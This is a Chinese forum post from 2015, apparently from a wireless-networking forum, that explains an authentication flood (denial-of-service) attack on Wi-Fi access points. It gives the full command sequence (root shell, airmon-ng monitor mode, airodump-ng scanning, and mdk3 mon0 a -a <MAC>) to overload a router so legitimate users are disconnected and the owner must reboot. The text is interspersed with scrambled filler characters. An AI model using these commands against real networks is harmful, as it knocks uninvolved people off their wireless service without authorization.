本帖最后由 191966260 于 2015-2-2 22:49 编辑 " W7 t! U2 N1 ~' U. B, |) M
% c8 ?! h8 W6 h9 z6 _& h* `
身份验证攻击效果说明:9 j& J: u# T \% z8 K
此攻击是针对无线AP的洪水攻击,又叫做身份验证攻击。其原理就是向AP发动大量的虚假的链接请求,这种请求数量一旦超 过了无线AP所能承受的范围,AP就会自动断开现有链接,使合法用户无法使用无线网络。迫使路由主人重启路由器。
e t6 I! G- j! Q4 _- S: o, b4 P
下面是我整理的整个攻击的步骤及命令,有不明白兄弟可以留言探讨! (很多兄弟都会发现自己的linux系统中找不到mdk3,然后满世界去找mdk3,却发现无处下载。哈哈,其实你们的Linux中都是有mdk3的,只是菜单里找不到而已,我们用终端命令就可以打开它了!BELIEVE ME!) 打开终端并获取root权限(鼠标右键单击或者菜单里都可以找到终端):
/ h6 T' z) x( O- Wsudo su 或 sudo -i
% G2 L9 p, H7 x! L3 E6 D' h8 W8 j打开mdk3:
. u' X2 m+ h( Z% K4 Y' b- W8 Isudo mdk3 首先检测网卡:& a0 g* a9 O/ g! w; w3 y" H
ifconfig -a 然后模拟端口(一般默认wlan0):& C7 a/ F" o$ ~! P# L
airmon-ng start wlan0 接着扫描AP(ctrl+c暂停):
0 y8 W' @( j4 yairodump-ng mon0 最后用mdk3做身份验证攻击(举例:mdk3 mon0 a -a 00:00:00:00:00)
9 p# l% A7 U! }2 Zmdk3 mon0 a -a mac+ ]' T) h& q" B- [3 S
O9 k2 ?- B& [/ |6 y1 } j8 Y+ F. d( B$ A Y! ^8 I
% G5 [1 m) }! e+ O爱生活,爱anywlan,我是阿龙!
; N1 M, r. Q* k. U0 V; K; ~6 l |